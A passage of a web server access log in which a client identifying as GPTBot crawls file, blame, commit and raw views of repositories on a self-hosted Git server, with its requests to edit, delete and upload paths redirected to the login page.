"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode" -[17/Feb/2026:17:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version?display=source" [Client 74.7.227.38] [Length 11201] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version" -[17/Feb/2026:17:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt?display=source" [Client 74.7.227.38] [Length 12315] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt" -[17/Feb/2026:17:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11027] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:17:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" -[17/Feb/2026:17:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11666] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" -[17/Feb/2026:17:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" [Client 74.7.227.38] [Length 11552] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" -[17/Feb/2026:17:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12037] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:17:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12062] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11204] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10982] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9833] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 1004] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:17:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/libcomm_core.so" -[17/Feb/2026:17:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12063] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 11546] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:17:42:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:17:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:17:42:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal/obj/Debug/net8.0" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:17:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:17:42:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:17:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:17:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 11792] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:17:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug" [Client 74.7.227.38] [Length 10097] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:17:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0" [Client 74.7.227.38] [Length 9822] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:17:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 11475] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:17:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 11589] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:17:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 11339] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" -[17/Feb/2026:17:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12062] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:17:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 1001] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 9894] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 10571] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 10916] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 9867] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 1015] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:43:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:43:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache?display=source" [Client 74.7.227.38] [Length 11356] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[17/Feb/2026:17:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:43:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug" -[17/Feb/2026:17:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug" -[17/Feb/2026:17:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug" [Client 74.7.227.38] [Length 9810] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug" -[17/Feb/2026:17:43:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:43:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:43:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:43:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:43:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:43:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:43:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 